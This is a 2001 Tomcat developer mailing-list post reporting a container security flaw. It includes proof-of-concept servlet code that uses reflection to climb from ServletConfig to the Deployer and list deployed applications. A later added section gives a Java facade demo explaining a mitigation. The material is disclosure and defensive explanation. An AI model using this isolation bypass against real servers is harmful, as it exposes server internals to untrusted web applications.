tomcat-dev mailing list archives

From Fabien Le Floc'h <...@operamail.com>
Subject container security issue
Date Fri, 11 May 2001 19:05:42 GMT
I apologize for repeating this, but I have not yet received any answer.

I wrote a servlet in a classic WAR file at an arbitrary location and NOT in the org.apache.catalina
package. From this servlet, I was able to access a method on the Deployer, i.e. I was able
to access anything public in any Container "from outside". This only works by using reflection.

Here is the code (not clean, sorry about that) for the doGet method:

	response.setContentType("text/plain");
	PrintWriter writer = response.getWriter();

	Object theWrapper = (Object) this.getServletConfig();
	try {
	    Method method = theWrapper.getClass().getMethod("getParent", new Class[] {});

	    Object theContext = method.invoke(theWrapper, new Object[] {});
	    method = theContext.getClass().getMethod("getParent", new Class[] {});
	    Object theDeployer = method.invoke(theContext, new Object[] {});
	    method = theDeployer.getClass().getMethod("findDeployedApps", new Class[] {});
	    Object deployedApps = method.invoke(theDeployer, new Object[] {});
	    String[] apps = (String[]) deployedApps;
	    writer.println("detected apps:");
	    for (int i=0; i<apps.length;i++) {
		writer.println(apps[i]);
	    }
	} catch (Exception e) {
	    e.printStackTrace();
	    writer.println("An exception occurred when invoking the method, "+e.getMessage());
	}
	writer.flush();
	writer.close();



Conclusion: there is a security issue. We don't need the prerequisite to access Catalina core
classes. I am really wondering how it would be possible to fix this security problem without
an important redesign.


Regards,


Fabien

P.S.: should I include a WAR file?
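
The reflective walk described in the message above depends on the servlet being handed the container's own internal object as its ServletConfig. The following is an added example, not part of the original message and not Tomcat's code; every class name in it is a hypothetical stand-in. It repeats the same getParent/getParent/findDeployedApps walk against a raw internal object and against a facade that exposes only the intended interface.

```java
import java.lang.reflect.Method;

public class FacadeDemo {
    // Same walk as in the message: config -> getParent -> getParent -> findDeployedApps.
    static String probe(Object config) {
        try {
            Object o = config;
            for (int i = 0; i < 2; i++) {
                Method m = o.getClass().getMethod("getParent");
                o = m.invoke(o);
            }
            String[] apps = (String[]) o.getClass().getMethod("findDeployedApps").invoke(o);
            return "reached deployer, apps=" + String.join(",", apps);
        } catch (ReflectiveOperationException e) {
            return "blocked: " + e;
        }
    }

    public static void main(String[] args) {
        Container host = new Container(null, "host");       // constructed sample hierarchy
        Container context = new Container(host, "context");
        Wrapper wrapper = new Wrapper(context, "servlet");
        System.out.println("raw wrapper : " + probe(wrapper));
        System.out.println("with facade : " + probe(new ConfigFacade(wrapper)));
    }
}

// Hypothetical stand-in for what a servlet is meant to see.
interface Config { String getName(); }

// Hypothetical stand-in for an internal container node with public methods.
class Container {
    private final Container parent;
    private final String name;
    Container(Container parent, String name) { this.parent = parent; this.name = name; }
    public Container getParent() { return parent; }
    public String getName() { return name; }
    public String[] findDeployedApps() { return new String[] {"/app1", "/app2"}; }
}

// Internal object handed to the servlet directly: its public methods are all reachable.
class Wrapper extends Container implements Config {
    Wrapper(Container parent, String name) { super(parent, name); }
}

// Facade: the only public methods are those of Config, so getParent is not found.
final class ConfigFacade implements Config {
    private final Config delegate;   // private; still needs a policy denying reflective field access
    ConfigFacade(Config delegate) { this.delegate = delegate; }
    public String getName() { return delegate.getName(); }
}
```

The facade removes the public path only; it has to be combined with a runtime policy that denies the web application reflective access to private members, otherwise the wrapped object is still reachable through the delegate field.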

